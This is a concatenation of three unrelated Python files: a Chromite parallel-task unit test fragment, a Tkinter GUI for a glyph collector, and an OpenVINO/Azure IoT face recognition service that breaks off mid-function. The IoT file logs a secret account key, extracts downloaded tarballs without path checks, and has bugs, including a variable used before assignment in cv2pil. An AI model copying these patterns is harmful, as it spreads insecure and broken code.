parallel.RunParallelSteps([self.testParallelHelloWorld] * 2)
def testLongTempDirectory(self):
"""Test that we can handle a long temporary directory."""
with osutils.TempDir() as tempdir:
new_tempdir = os.path.join(tempdir, 'xxx/' * 100)
osutils.SafeMakedirs(new_tempdir)
old_tempdir, old_tempdir_env = osutils.SetGlobalTempDir(new_tempdir)
try:
self.testParallelHelloWorld()
finally:
osutils.SetGlobalTempDir(old_tempdir, old_tempdir_env)
def _BackgroundTaskRunnerArgs(results, arg1, arg2, kwarg1=None, kwarg2=None):
"""Helper for TestBackgroundTaskRunnerArgs
We specifically want a module function to test against and not a class member.
"""
results.put((arg1, arg2, kwarg1, kwarg2))
class TestBackgroundTaskRunnerArgs(TestBackgroundWrapper):
"""Unittests for BackgroundTaskRunner argument handling."""
def testArgs(self):
"""Test that we can pass args down to the task."""
with parallel.Manager() as manager:
results = manager.Queue()
arg2s = set((1, 2, 3))
with parallel.BackgroundTaskRunner(_BackgroundTaskRunnerArgs, results,
'arg1', kwarg1='kwarg1') as queue:
for arg2 in arg2s:
queue.put((arg2,))
# Since the queue is unordered, need to handle arg2 specially.
result_arg2s = set()
for _ in xrange(3):
result = results.get()
self.assertEquals(result[0], 'arg1')
result_arg2s.add(result[1])
self.assertEquals(result[2], 'kwarg1')
self.assertEquals(result[3], None)
self.assertEquals(arg2s, result_arg2s)
self.assertEquals(results.empty(), True)
class TestFastPrinting(TestBackgroundWrapper):
"""Stress tests for background sys.stdout handling."""
def _FastPrinter(self):
# Writing lots of output quickly often reproduces bugs in this module
# because it can trigger race conditions.
for _ in range(_NUM_WRITES - 1):
sys.stdout.write('x' * _BUFSIZE)
sys.stdout.write('x' * (_BUFSIZE - 1) + '\n')
def _ParallelPrinter(self):
parallel.RunParallelSteps([self._FastPrinter] * _NUM_THREADS)
def _NestedParallelPrinter(self):
parallel.RunParallelSteps([self._ParallelPrinter])
def testSimpleParallelPrinter(self):
out = self.wrapOutputTest(self._ParallelPrinter)
self.assertEquals(len(out), _TOTAL_BYTES)
def testNestedParallelPrinter(self):
"""Verify that no output is lost when lots of output is written."""
out = self.wrapOutputTest(self._NestedParallelPrinter)
self.assertEquals(len(out), _TOTAL_BYTES)
class TestRunParallelSteps(cros_test_lib.TestCase):
"""Tests for RunParallelSteps."""
def testReturnValues(self):
"""Test that we pass return values through when requested."""
def f1():
return 1
def f2():
return 2
def f3():
pass
return_values = parallel.RunParallelSteps([f1, f2, f3], return_values=True)
self.assertEquals(return_values, [1, 2, None])
def testLargeReturnValues(self):
"""Test that the managed queue prevents hanging on large return values."""
def f1():
return ret_value
ret_value = ''
for _ in xrange(10000):
ret_value += 'This will be repeated many times.\n'
return_values = parallel.RunParallelSteps([f1], return_values=True)
self.assertEquals(return_values, [ret_value])
class TestParallelMock(TestBackgroundWrapper):
"""Test the ParallelMock class."""
def setUp(self):
self._calls = 0
def _Callback(self):
self._calls += 1
return self._calls
def testRunParallelSteps(self):
"""Make sure RunParallelSteps is mocked out."""
with ParallelMock():
parallel.RunParallelSteps([self._Callback])
self.assertEqual(1, self._calls)
def testBackgroundTaskRunner(self):
"""Make sure BackgroundTaskRunner is mocked out."""
with ParallelMock():
parallel.RunTasksInProcessPool(self._Callback, [])
self.assertEqual(0, self._calls)
result = parallel.RunTasksInProcessPool(self._Callback, [[]])
self.assertEqual(1, self._calls)
self.assertEqual([1], result)
result = parallel.RunTasksInProcessPool(self._Callback, [], processes=9,
onexit=self._Callback)
self.assertEqual(10, self._calls)
self.assertEqual([], result)
result = parallel.RunTasksInProcessPool(self._Callback, [[]] * 10)
self.assertEqual(range(11, 21), result)
class TestExceptions(cros_test_lib.MockOutputTestCase):
"""Test cases where child processes raise exceptions."""
def _SystemExit(self):
sys.stdout.write(_GREETING)
sys.exit(1)
def _KeyboardInterrupt(self):
sys.stdout.write(_GREETING)
raise KeyboardInterrupt()
def _BadPickler(self):
return self._BadPickler
class _TestException(Exception):
"""Custom exception for testing."""
def _VerifyExceptionRaised(self, fn, exc_type):
"""A helper function to verify the correct |exc_type| is raised."""
for task in (lambda: parallel.RunTasksInProcessPool(fn, [[]]),
lambda: parallel.RunParallelSteps([fn])):
output_str = ex_str = ex = None
with self.OutputCapturer() as capture:
with self.assertRaises(parallel.BackgroundFailure) as ex:
task()
output_str = capture.GetStdout()
ex_str = str(ex.exception)
self.assertTrue(exc_type in [x.type for x in ex.exception.exc_infos])
self.assertEqual(output_str, _GREETING)
self.assertTrue(str(exc_type) in ex_str)
def testExceptionRaising(self):
"""Tests the exceptions are raised correctly."""
self.StartPatcher(BackgroundTaskVerifier())
self._VerifyExceptionRaised(self._KeyboardInterrupt, KeyboardInterrupt)
self._VerifyExceptionRaised(self._SystemExit, SystemExit)
def testExceptionPriority(self):
"""Tests that foreground exceptions take priority over background."""
self.StartPatcher(BackgroundTaskVerifier())
with self.assertRaises(self._TestException):
with parallel.BackgroundTaskRunner(self._KeyboardInterrupt,
processes=1) as queue:
queue.put([])
raise self._TestException()
def testFailedPickle(self):
"""PicklingError should be thrown when an argument fails to pickle."""
with self.assertRaises(cPickle.PicklingError):
parallel.RunTasksInProcessPool(self._SystemExit, [[self._SystemExit]])
def testFailedPickleOnReturn(self):
"""PicklingError should be thrown when a return value fails to pickle."""
with self.assertRaises(parallel.BackgroundFailure):
parallel.RunParallelSteps([self._BadPickler], return_values=True)
class _TestForegroundException(Exception):
"""An exception to be raised by the foreground process."""
class TestHalting(cros_test_lib.MockOutputTestCase, TestBackgroundWrapper):
"""Test that child processes are halted when exceptions occur."""
def setUp(self):
self.failed = multiprocessing.Event()
self.passed = multiprocessing.Event()
def _GetKillChildrenTimeout(self):
"""Return a timeout that is long enough for _BackgroundTask._KillChildren.
This unittest is not meant to restrict which signal succeeds in killing the
background process, so use a long enough timeout whenever asserting that the
background process is killed, keeping buffer for slow builders.
"""
return (parallel._BackgroundTask.SIGTERM_TIMEOUT +
parallel._BackgroundTask.SIGKILL_TIMEOUT) + 30
def _Pass(self):
self.passed.set()
sys.stdout.write(_GREETING)
def _Exit(self):
sys.stdout.write(_GREETING)
self.passed.wait()
sys.exit(1)
def _Fail(self):
self.failed.wait(self._GetKillChildrenTimeout())
self.failed.set()
def _PassEventually(self):
self.passed.wait(self._GetKillChildrenTimeout())
self.passed.set()
@unittest.skipIf(_SKIP_FLAKY_TESTS, 'Occasionally fails.')
def testExceptionRaising(self):
"""Test that exceptions halt all running steps."""
steps = [self._Exit, self._Fail, self._Pass, self._Fail]
output_str, ex_str = None, None
with self.OutputCapturer() as capture:
try:
parallel.RunParallelSteps(steps, halt_on_error=True)
except parallel.BackgroundFailure as ex:
output_str = capture.GetStdout()
ex_str = str(ex)
logging.debug(ex_str)
self.assertTrue('Traceback' in ex_str)
self.assertTrue(self.passed.is_set())
self.assertEqual(output_str, _GREETING)
self.assertFalse(self.failed.is_set())
def testForegroundExceptionRaising(self):
"""Test that BackgroundTaskRunner halts tasks on a foreground exception."""
with self.assertRaises(_TestForegroundException):
with parallel.BackgroundTaskRunner(self._PassEventually,
processes=1,
halt_on_error=True) as queue:
queue.put([])
raise _TestForegroundException()
self.assertFalse(self.passed.is_set())
@unittest.skipIf(_SKIP_FLAKY_TESTS, 'Occasionally fails.')
def testTempFileCleanup(self):
"""Test that all temp files are cleaned up."""
with osutils.TempDir() as tempdir:
self.assertEqual(os.listdir(tempdir), [])
self.testExceptionRaising()
self.assertEqual(os.listdir(tempdir), [])
def testKillQuiet(self, steps=None, **kwargs):
"""Test that processes do get killed if they're silent for too long."""
if steps is None:
steps = [self._Fail] * 2
kwargs.setdefault('SILENT_TIMEOUT', 0.1)
kwargs.setdefault('MINIMUM_SILENT_TIMEOUT', 0.01)
kwargs.setdefault('SILENT_TIMEOUT_STEP', 0)
kwargs.setdefault('SIGTERM_TIMEOUT', 0.1)
kwargs.setdefault('PRINT_INTERVAL', 0.01)
kwargs.setdefault('GDB_COMMANDS', ('detach',))
ex_str = None
with mock.patch.multiple(parallel._BackgroundTask, **kwargs):
with self.OutputCapturer() as capture:
try:
with cros_test_lib.LoggingCapturer():
parallel.RunParallelSteps(steps)
except parallel.BackgroundFailure as ex:
ex_str = str(ex)
error_str = capture.GetStderr()
self.assertTrue('parallel_unittest.py' in error_str)
self.assertTrue(ex_str)
class TestConstants(cros_test_lib.TestCase):
"""Test values of constants."""
def testSilentTimeout(self):
"""Verify the silent timeout is small enough."""
# Enforce that the default timeout is less than 9000, the default timeout
# set in build/scripts/master/factory/chromeos_factory.py:ChromiteFactory
# in the Chrome buildbot source code.
self.assertLess(
parallel._BackgroundTask.SILENT_TIMEOUT, 9000,
'Do not increase this timeout. Instead, print regular progress '
'updates, so that buildbot (and cbuildbot) will will know that your '
'program has not hung.')
class TestExitWithParent(cros_test_lib.TestCase):
"""Tests ExitWithParent."""
def testChildExits(self):
"""Create a child and a grandchild. The child should die with the parent."""
def GrandChild():
parallel.ExitWithParent()
time.sleep(9)
def Child(queue):
grand_child = multiprocessing.Process(target=GrandChild)
grand_child.start()
queue.put(grand_child.pid)
time.sleep(9)
with parallel.Manager() as manager:
q = manager.Queue()
child = multiprocessing.Process(target=lambda: Child(q))
child.start()
grand_child_pid = q.get(timeout=1)
# Before we kill the child, the grandchild should be running:
self.assertTrue(os.path.isdir('/proc/%d' % grand_child_pid))
os.kill(child.pid, signal.SIGKILL)
# (shortly) after we kill the child, the grandchild should kill itself.
# We can't use os.waitpid because the grandchild process is not a child
# process of ours. Just wait 20 seconds - this should be enough even if the
# machine is under load.
timeout_util.WaitForReturnTrue(
lambda: os.path.isdir('/proc/%d' % grand_child_pid),
20,
period=0.05)
def main(_argv):
cros_test_lib.main(level='info', module=__name__)
|
main.py
|
from Tkinter import *
import tkFileDialog
import tkMessageBox
import threading
from glyphcollector.collection_handler import CollectionHandler
from tools import AverageCalculator, count_images, listFolderPaths
class App:
def __init__( self, parent ):
self.stateVar = "Ready"
self.collectionHandler = CollectionHandler( )
self.averageCalculator = AverageCalculator( )
self.root = parent
self.root.title( "GlyphCollector" )
self.root.createcommand( 'tkAboutDialog', self.showAbout )
self.root.after( 50, self.updateStateLabel )
self.root.protocol( 'WM_DELETE_WINDOW', self.killProcessAndQuit )
self.collectionThread = None
self.avgThread = None
self.stateLabelVar = StringVar( )
self.stateLabelVar.set( self.stateVar )
self.scans_path_selected = False
self.templates_path_selected = False
self.output_path_selected = False
self.scanpathentry = None
self.templatespathentry = None
self.outputpathentry = None
self.scansPathVar = StringVar( )
self.templatesPathVar = StringVar( )
self.outputPathVar = StringVar( )
self.init_widgets( )
def showAbout( self ):
info = "GlyphCollector was written by Gabor Kerekes"
tkMessageBox.showinfo( "About", info )
def init_widgets( self ):
def scrollToEnd( entry ):
entry.icursor( END )
entry.xview_moveto( 1.0 )
topFrame = Frame( self.root )
bottomFrame = Frame( self.root )
statusFrame = Frame( self.root, bg='grey' )
topFrame.grid( column=0, row=0, padx=20, pady=20, sticky=W )
bottomFrame.grid( column=0, row=1, padx=20, pady=20, sticky=W )
statusFrame.grid( column=0, row=2, sticky=W + E + S )
############ SCANS ##############
Label( topFrame, text="Scans directory:" ).grid( row=0, column=0, sticky=W )
self.scanpathentry = Entry( topFrame, bg="grey", width=50, textvariable=self.scansPathVar )
self.scanpathentry.grid( padx=3, row=0, column=2, sticky=W )
Button( topFrame, text="...", command=self.select_scans_path ).grid( row=0, column=3, sticky=W )
############ TEMPLATES ##############
Label( topFrame, text="Templates directory:" ).grid( row=1, column=0, sticky=W )
self.templatespathentry = Entry( topFrame, bg="grey", width=50, textvariable=self.templatesPathVar )
self.templatespathentry.grid( padx=3, row=1, column=2, sticky=W )
Button( topFrame, text="...", command=self.select_templates_path ).grid( row=1, column=3, sticky=W )
############ OUTPUT ##############
Label( topFrame, text="Output directory:" ).grid( row=2, column=0, sticky=W )
self.outputpathentry = Entry( topFrame, bg="grey", width=50, textvariable=self.outputPathVar )
self.outputpathentry.grid( padx=3, row=2, column=2, sticky=W )
Button( topFrame, text="...", command=self.select_output_path ).grid( row=2, column=3, sticky=W )
Checkbutton( topFrame, text="Test run", command=self.collectionHandler.toggleTestRun ) \
.grid( row=3, column=0, sticky=W, pady=10 )
############ CONTROL ##############
Button( bottomFrame, text="Collect Glyphs", command=self.init_collection_process ) \
.grid( row=0, column=0, sticky=W + E )
Button( bottomFrame, text="Calculate Averages", command=self.init_average_calculation_process ) \
.grid( row=0, column=1, sticky=W + E )
Button( bottomFrame, text="Cancel", command=self.killProcess ) \
.grid( row=0, column=2, sticky=W + E )
############ STATUS ##############
Label( statusFrame, text="Status:", bg='grey', ).grid( row=0, column=0, sticky=W, pady=5, padx=20 )
Label( statusFrame, textvariable=self.stateLabelVar, bg='grey', justify=LEFT ) \
.grid( row=0, column=1 )
def updateStateLabel( self ):
if self.collectionThread and self.collectionThread.isAlive( ):
self.stateLabelVar.set( self.collectionHandler.stateVar )
elif self.avgThread and self.avgThread.isAlive( ):
self.stateLabelVar.set( self.averageCalculator.stateVar )
else:
self.stateLabelVar.set( "Ready" )
self.root.after( 50, self.updateStateLabel )
def select_scans_path( self ):
dirname = tkFileDialog.askdirectory( parent=self.root, title="select scans directory", mustexist=False )
if dirname:
self.scans_path_selected = True
self.scansPathVar.set( dirname )
print 'scans directory:', dirname
self.scanpathentry.xview_moveto( 1.0 )
def select_templates_path( self ):
dirname = tkFileDialog.askdirectory(
parent=self.root,
title="select templates directory",
mustexist=False )
if dirname:
self.templates_path_selected = True
self.templatesPathVar.set( dirname )
print 'templates directory:', dirname
self.templatespathentry.xview_moveto( 1.0 )
def select_output_path( self ):
dirname = tkFileDialog.askdirectory(
parent=self.root,
title="select output directory",
mustexist=False )
if dirname:
self.output_path_selected = True
self.outputPathVar.set( dirname )
print 'output directory:', dirname
self.outputpathentry.xview_moveto( 1.0 )
def init_collection_process( self ):
scansPath = self.scansPathVar.get( )
templatesPath = self.templatesPathVar.get( )
outputPath = self.outputPathVar.get( )
if scansPath and templatesPath and outputPath:
self.collectionHandler.set_output_path( outputPath )
if count_images( scansPath ) > 0:
self.collectionHandler.set_scans_dirpath( scansPath )
if count_images( templatesPath ) > 0:
self.collectionHandler.set_templates_dirpath( templatesPath )
self.collectionThread = threading.Thread( target=self.collectionHandler.run )
self.collectionThread.start( )
else:
tkMessageBox.showerror( "Error", "The templates folder doesn't seem to contain any JPEGs." )
else:
tkMessageBox.showerror( "Error", "The scans folder doesn't seem to contain any JPEGs." )
else:
tkMessageBox.showerror( "Error", "Please specify all folders." )
def init_average_calculation_process( self ):
if not self.collectionThread or not self.collectionThread.isAlive( ):
outputPath = self.outputPathVar.get( )
if outputPath:
if listFolderPaths( outputPath ):
self.averageCalculator.setFolderPath( outputPath )
self.avgThread = threading.Thread( target=self.averageCalculator.run )
self.avgThread.start( )
else:
tkMessageBox.showerror( "Error",
"In order to calculate averages, the 'Output directory' needs to contain the results of the collection process." )
else:
tkMessageBox.showerror( "Error", "Please specify the output folder." )
else:
print "collection is running"
def killProcess( self ):
if self.collectionThread and self.collectionThread.isAlive( ):
self.collectionHandler.stateVar = "Stopped"
self.collectionHandler.stop = True
elif self.avgThread and self.avgThread.isAlive( ):
self.averageCalculator.stateVar = "Stopped"
self.averageCalculator.stop = True
def killProcessAndQuit( self ):
self.killProcess( )
self.root.quit( )
def main( ):
root = Tk( )
App( root )
root.resizable( 0, 0 )
root.mainloop( )
main( )
|
app.py
|
import threading
from PIL import Image
import os
import io
import json
import logging
import linecache
import sys
import datetime
import asyncio
from argparse import ArgumentParser
import cv2
import numpy as np
from openvino.inference_engine import IECore
from flask import Flask, request, jsonify, Response
from file_uploader import FileUploader
from object_detector import ObjectDetector
from face_recognizer import FaceRecognizer
from iot_client import IoTClient, IoTModuleClient, IoTDeviceClient
import requests
import tarfile
from six.moves import input
# from azure.iot.device import IoTHubModuleClient
intervalSec = 60
inferenceMark = False
sendDetection = False
modelLoaded = False
FACEDB_FOLDER_NAME = None
def update_reported_properties_of_loaded_model(client, od_model, fr_fd_model, fr_lm_model, fr_reid_model, fr_ag_model):
if fr_ag_model:
fr_ag_model = 'none'
current_status = {"loaded_models": {'od':od_model, 'fr_fd':fr_fd_model, 'fr_lm':fr_lm_model, 'fr_reid':fr_reid_model, 'fr_ag':fr_ag_model }}
client.patch_twin_reported_properties(current_status)
def update_reported_properties_of_ipaddress(client, ipaddress):
current_status = {'ipaddress': ipaddress}
client.patch_twin_reported_properties(current_status)
def downloadModelsFile(modelUrl, modelFileName, modelFolderName):
modelFolderPath = None
response = requests.get(modelUrl)
if response.status_code == 200:
os.makedirs(modelFolderName, exist_ok=True)
saveFileName = os.path.join(modelFolderName, modelFileName)
with open(saveFileName, 'wb') as saveFile:
saveFile.write(response.content)
logging.info('Succeeded to download new model.')
if modelFileName.endswith('.tgz'):
tar = tarfile.open(saveFileName, 'r:gz')
tar.extractall(modelFolderName)
os.remove(saveFileName)
modelFolderPath = os.path.join(os.getcwd(), modelFolderName)
else:
logging.info(f'Failed to download {modelUrl}')
return modelFolderPath
def parse_desired_properties_request(client, configSpec, od, fr, configLock):
sendKey = 'send-telemetry'
global sendDetection, modelLoaded
if sendKey in configSpec:
configLock.acquire()
sendDetection = bool(configSpec[sendKey])
configLock.release()
logging.info(f'new send detection telemetry = {sendDetection}')
uploadImageKey = 'upload'
global intervalSec, inferenceMark
if uploadImageKey in configSpec:
configLock.acquire()
if 'interval-sec' in configSpec[uploadImageKey]:
intervalSec = int(configSpec[uploadImageKey]['interval-sec'])
if 'inference-mark' in configSpec[uploadImageKey]:
inferenceMark = bool(configSpec[uploadImageKey]['inference-mark'])
configLock.release()
logging.info(f'new interval-sec = {intervalSec}')
logging.info(f'new inference-mark = {inferenceMark}')
# AI models
if modelLoaded:
logging.info('Model update will be done at next starting.')
return
odModelName = None
fdModelName = None
lmModelName = None
reidModelName = None
odModelLoaded = False
frModelLoaded = False
odModelFileKey = 'model-od'
if odModelFileKey in configSpec:
modelUrl = configSpec[odModelFileKey]['url']
modelFileName = configSpec[odModelFileKey]['filename']
odModelName = configSpec[odModelFileKey]['name']
odLabelName = configSpec[odModelFileKey]['label']
odArchType = configSpec[odModelFileKey]['architecture-type']
modelFolderPath = os.path.join(os.getcwd(), odModelFileKey)
modelPath = os.path.join(modelFolderPath, odModelName)
labelPath = os.path.join(modelFolderPath, odLabelName)
logging.info(f'Receive request of object detection model update - Model:{odModelName}, Label:{odLabelName}, ArchitectureType:{odArchType} - {modelUrl}')
if os.path.exists(modelPath) and os.path.exists(labelPath):
logging.info(f'Model:{odModelName} and Labels:{odLabelName} has been downloaded.')
else:
logging.info(f'Loading {modelFileName}...')
modelFolderPath = downloadModelsFile(modelUrl,modelFileName,odModelFileKey)
modelPath = os.path.join(modelFolderPath, odModelName)
labelPath = os.path.join(modelFolderPath, odLabelName)
configLock.acquire()
res = od.LoadModel(modelPath, labelPath, odArchType)
configLock.release()
if res == 0:
logging.info('object detection model load succeeded')
odModelLoaded = True
global FACEDB_FOLDER_NAME
frModelFileKey = 'model-fr'
if frModelFileKey in configSpec:
modelUrl = configSpec[frModelFileKey]['url']
modelFileName = configSpec[frModelFileKey]['filename']
fdModelName = configSpec[frModelFileKey]['fd-name']
lmModelName = configSpec[frModelFileKey]['lm-name']
reidModelName = configSpec[frModelFileKey]['reid-name']
logging.info(f'Receive request of face recognition model update - {modelFileName} - {modelUrl}')
agModelName = None
if 'ag-name' in configSpec[frModelFileKey]:
agModelName = configSpec[frModelFileKey]['ag-name']
modelFolderPath = os.path.join(os.getcwd(), frModelFileKey)
fdModelPath = os.path.join(modelFolderPath, fdModelName)
lmModelPath = os.path.join(modelFolderPath, lmModelName)
reidModelPath = os.path.join(modelFolderPath, reidModelName)
agModelPath = None
if agModelName:
agModelPath = os.path.join(modelFolderPath, agModelName)
logging.info(f'Use {agModelName} as age gender detection.')
if os.path.exists(fdModelPath) and os.path.exists(lmModelPath) and os.path.exists(reidModelPath):
logging.info(f'FD Model:{fdModelName}, LM Model:{lmModelName}, REID Model:{reidModelName} have been downloaded.')
else:
logging.info(f'Loading {modelFileName}...')
modelFolderPath = downloadModelsFile(modelUrl,modelFileName,frModelFileKey)
fdModelPath = os.path.join(modelFolderPath, fdModelName)
lmModelPath = os.path.join(modelFolderPath, lmModelName)
reidModelPath = os.path.join(modelFolderPath, reidModelName)
if agModelName:
agModelPath = os.path.join(modelFolderPath, agModelName)
if 'face-db' in configSpec:
faceDBSpec = configSpec['face-db']
faceDBUrl = faceDBSpec['url']
faceDBFileName = faceDBSpec['filename']
logging.info(f'faced-db file is {faceDBFileName}, extract to {FACEDB_FOLDER_NAME}')
folderPath = downloadModelsFile(faceDBUrl, faceDBFileName, FACEDB_FOLDER_NAME)
configLock.acquire()
res = fr.LoadModel(fdModelPath, lmModelPath, reidModelPath, agModelPath)
configLock.release()
if res == 0:
logging.info('face recognition model load succeeded')
frModelLoaded = True
modelLoaded = odModelLoaded and frModelLoaded
if odModelName and fdModelName and lmModelName and reidModelName and client:
update_reported_properties_of_loaded_model(client, odModelName, fdModelName, lmModelName, reidModelName, agModelName)
def twin_patch_handler(patch):
logging.info(f'Twin desired properties patch updated. - {patch}')
parse_desired_properties_request(client, patch, None, None, configLock)
def twin_update_listener(client, configLock):
while True:
global intervalSec, inferenceMark
patch = client.receive_twin_desired_properties_patch() # blocking call
logging.info(f'Twin desired properties patch updated. - {patch}')
parse_desired_properties_request(client, patch, None, None, configLock)
def setup_iot(edgeDeviceId, od, fr, configLock, cs):
if not edgeDeviceId and not cs:
logging.info('This execution may be test.')
return None
try:
global inferenceMark, intervalSec
if not sys.version >= "3.5.3":
raise Exception( "The sample requires python 3.5.3+. Current version of Python: %s" % sys.version )
logging.info( "IoT Hub Client for Python" )
iotClient = None
if edgeDeviceId:
# The client object is used to interact with your Azure IoT hub.
iotClient = IoTModuleClient()
logging.info('Initialized as IoT Edge Module.')
elif cs:
iotClient = IoTDeviceClient(cs)
logging.info('Initialized as IoT Device App')
if iotClient:
# connect the client.
iotClient.connect()
logging.info("Connected to Edge Runtime.")
currentTwin = iotClient.get_twin()
configSpec = currentTwin['desired']
parse_desired_properties_request(iotClient, configSpec, od, fr, configLock)
iotClient.receive_twin_desired_properties_patch_handler(parse_desired_properties_request, configLock)
# twin_update_listener_thread = threading.Thread(target=twin_update_listener, args=(iotClient, configLock))
# twin_update_listener_thread.daemon = True
# twin_update_listener_thread.start()
logging.info('IoT Edge or Device settings done.')
return iotClient
except Exception as e:
logging.warning( "Unexpected error %s " % e )
raise
logging.basicConfig(level=logging.INFO)
def build_argparser():
parser = ArgumentParser()
general = parser.add_argument_group('General')
general.add_argument('-pg', '--pg', required=False, help='Required. Folder path of Face DB.')
general.add_argument('-d', '--device', required=False, help='Required. should be CPU | GPU | MYRIAD | HETERO | HDDL')
general.add_argument('-m', '--inference_mask', default=False, required=False, action='store_true', help='Optional. Mark Inference raectangle on a frame.')
iot = parser.add_argument_group('IoT Hub')
iot.add_argument('-cs', '--connection_string', required=False)
iot.add_argument('-opod', '--output_path_od', required=False)
iot.add_argument('-opfr', '--output_path_fr', required=False)
od = parser.add_argument_group('Object Detection')
od.add_argument('-ou', '--od_url', required=False, help='Required. Specify url of object detection tgz file.')
od.add_argument('-of', '--od_filename', required=False, help='Required. Specify file name of the tgz file.')
od.add_argument('-on', '--od_name', required=False, help='Required. Specify file name of object detection model.')
od.add_argument('-ol', '--od_label', required=False, help='Required. Specify file name of object detection labels.')
od.add_argument('-oa', '--od_architecture_type', required=False, help='Required. Specify architecture type of the object detection model. should be ssd | ctpn | yolo | yolov4 | faceboxes | centernet | retinaface | ultra_lightweight_face_detection | retinaface-pytorch')
fr = parser.add_argument_group('Face Recognition')
fr.add_argument('-fu', '--fr_url', required=False, help='Required. Specify url of face recoginition tgz file.')
fr.add_argument('-ff', '--fr_filename', required=False, help='Required. Specify file name of the tgz file.')
fr.add_argument('-fd', '--fr_fd_name', required=False, help='Required. Specify file name of face detection model.')
fr.add_argument('-fl', '--fr_lm_name', required=False, help='Required. Specify file name landmark detection model.')
fr.add_argument('-fr', '--fr_reid_name', required=False, help='Required. Specify file name of face recognition model.')
return parser
def pil2cv(image):
cvimg = np.array(image, dtype=np.uint8)
if cvimg.ndim == 2: # Black and White
pass
elif cvimg.shape[2] == 3: # Color
cvimg = cv2.cvtColor(cvimg, cv2.COLOR_RGB2BGR)
elif cvimg.shape[2] == 4: # Transparent
cvimg = cv2.cvtColor(cvimg, cv2.COLOR_RGBA2BGRA)
return cvimg
def cv2pil(image):
img = image.copy()
if img.ndim == 2:
pass
elif img.shape[2] == 3:
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
elif pilImage.shape[2] == 4:
img = cv2.cvtColor(img, cv2.COLOR_BGRA2RGBA)
pilImage = Image.fromarray(img)
return pilImage
async def main():
args = None
iotClient = None
IOTEDGE_DEVICEID = None
if 'IOTEDGE_DEVICEID' in os.environ:
IOTEDGE_DEVICEID=os.environ['IOTEDGE_DEVICEID']
else:
args = build_argparser().parse_args()
fileUploader = None
if 'BLOB_ON_EDGE_MODULE' in os.environ and 'BLOB_ON_EDGE_ACCOUNT_NAME' in os.environ and 'BLOB_ON_EDGE_ACCOUNT_KEY' in os.environ and 'BLOB_CONTAINER_NAME':
BLOB_ON_EDGE_MODULE = os.environ['BLOB_ON_EDGE_MODULE']
BLOB_ON_EDGE_ACCOUNT_NAME = os.environ['BLOB_ON_EDGE_ACCOUNT_NAME']
BLOB_ON_EDGE_ACCOUNT_KEY = os.environ['BLOB_ON_EDGE_ACCOUNT_KEY']
BLOB_CONTAINER_NAME = os.environ['BLOB_CONTAINER_NAME']
logging.info(f'Blob Service specified. BLOB_ON_EDGE_MODULE={BLOB_ON_EDGE_MODULE},BLOB_ON_EDGE_ACCOUNT_NAME={BLOB_ON_EDGE_ACCOUNT_NAME},BLOB_ON_EDGE_ACCOUNT_KEY={BLOB_ON_EDGE_ACCOUNT_KEY},BLOB_CONTAINER_NAME={BLOB_CONTAINER_NAME}')
fileUploader = FileUploader(BLOB_ON_EDGE_MODULE, BLOB_ON_EDGE_ACCOUNT_NAME, BLOB_ON_EDGE_ACCOUNT_KEY, BLOB_CONTAINER_NAME)
fileUploader.initialize()
logging.info('FileUploader initialized.')
global FACEDB_FOLDER_NAME
if 'FACEDB_FOLDER_NAME' in os.environ:
FACEDB_FOLDER_NAME = os.environ['FACEDB_FOLDER_NAME']
else:
if args:
FACEDB_FOLDER_NAME = args.pg
logging.info(f'Face DB Folder - {FACEDB_FOLDER_NAME}')
OPENVINO_DEVICE = None
if 'OPENVINO_DEVICE' in os.environ:
OPENVINO_DEVICE = os.environ['OPENVINO_DEVICE']
else:
if args:
OPENVINO_DEVICE = args.device
logging.info((f'OpenVino Device - {OPENVINO_DEVICE}'))
MSG_OUTPUT_PATH_OD = None
if 'MSG_OUTPUT_PATH_OD' in os.environ:
MSG_OUTPUT_PATH_OD = os.environ['MSG_OUTPUT_PATH_OD']
else:
if args:
MSG_OUTPUT_PATH_OD = args.output_path_od
else:
if IOTEDGE_DEVICEID:
MSG_OUTPUT_PATH_OD = 'output_od'
MSG_OUTPUT_PATH_FR = None
if 'MSG_OUTPUT_PATH_FR' in os.environ:
MSG_OUTPUT_PATH_FR = os.environ['MSG_OUTPUT_PATH_FR']
else:
if args:
MSG_OUTPUT_PATH_FR = args.output_path_fr
else:
if IOTEDGE_DEVICEID:
MSG_OUTPUT_PATH_FR = 'output_fr'
logging.info(f'IoT Edge Module Output Path - OD:{MSG_OUTPUT_PATH_OD},FR:{MSG_OUTPUT_PATH_FR}')
iotDeviceCS = None
if args:
iotDeviceCS = args.connection_string
logging.info(f'IoT Device App Mode : {iotDeviceCS}')
else:
if IOTEDGE_DEVICEID:
logging.info(f'IoT Edge Model Mode : {IOTEDGE_DEVICEID}')
app = Flask(__name__)
logging.info('Initialize Infarence Engine...')
ie = IECore()
objectDetector = ObjectDetector(ie, OPENVINO_DEVICE)
faceRecognizer = FaceRecognizer(ie, OPENVINO_DEVICE, FACEDB_FOLDER_NAME)
# res = ovmv.LoadModel('/result/open_model_zoo/tools/downloader/intel/face-detection-adas-0001/FP16/face-detection-adas-0001.xml')
configLock = threading.Lock()
iotClient = setup_iot(IOTEDGE_DEVICEID, objectDetector, faceRecognizer, configLock, iotDeviceCS)
if args:
if args.od_url and args.od_filename and args.od_name and args.od_label and args.od_architecture_type and args.fr_url and args.fr_filename and args.fr_fd_name and args.fr_lm_name and args.fr_reid_name :
configSpec = {
'send-telemetry': False,
'upload' : { 'interval-sec': 60, 'inference-mark': args.inference_mask },
'model-od' : {
'url': args.od_url,
'filename': args.od_filename,
'name': args.od_name,
'label': args.od_label,
'architecture-type': args.od_architecture_type
},
'model-fr': {
'url': args.fr_url,
'filename': args.fr_filename,
'fd-name': args.fr_fd_name,
'lm-name': args.fr_lm_name,
'reid-name': args.fr_reid_name
}
}
parse_desired_properties_request(iotClient, configSpec, objectDetector, faceRecognizer, configLock)
# time_delta_sec = 60
if fileUploader and iotClient:
update_reported_properties_of_ipaddress(iotClient, fileUploader.gethostname())
@app.route("/facerecognition", methods = ['POST'])
async def facerecognition():
try:
global intervalSec, inferenceMark, sendDetection
logging.info('received recognition request')
# import pdb; pdb.set_trace()
imageData = io.BytesIO(request.get_data())
pilImage = Image.open((imageData))
frame = pil2cv(pilImage)
logging.info('Recognizing...')
configLock.acquire()
nowTime = datetime.datetime.now()
timeDelta = nowTime - faceRecognizer.GetScoredTime()
logging.info(f'process time - now={nowTime}, scored time={faceRecognizer.GetScoredTime()}')
detectedObjects, output_frame = faceRecognizer.Process(frame, inferenceMark)
isSendTelemetry = sendDetection
configLock.release()
logging.info('Recognized.')
if isSendTelemetry:
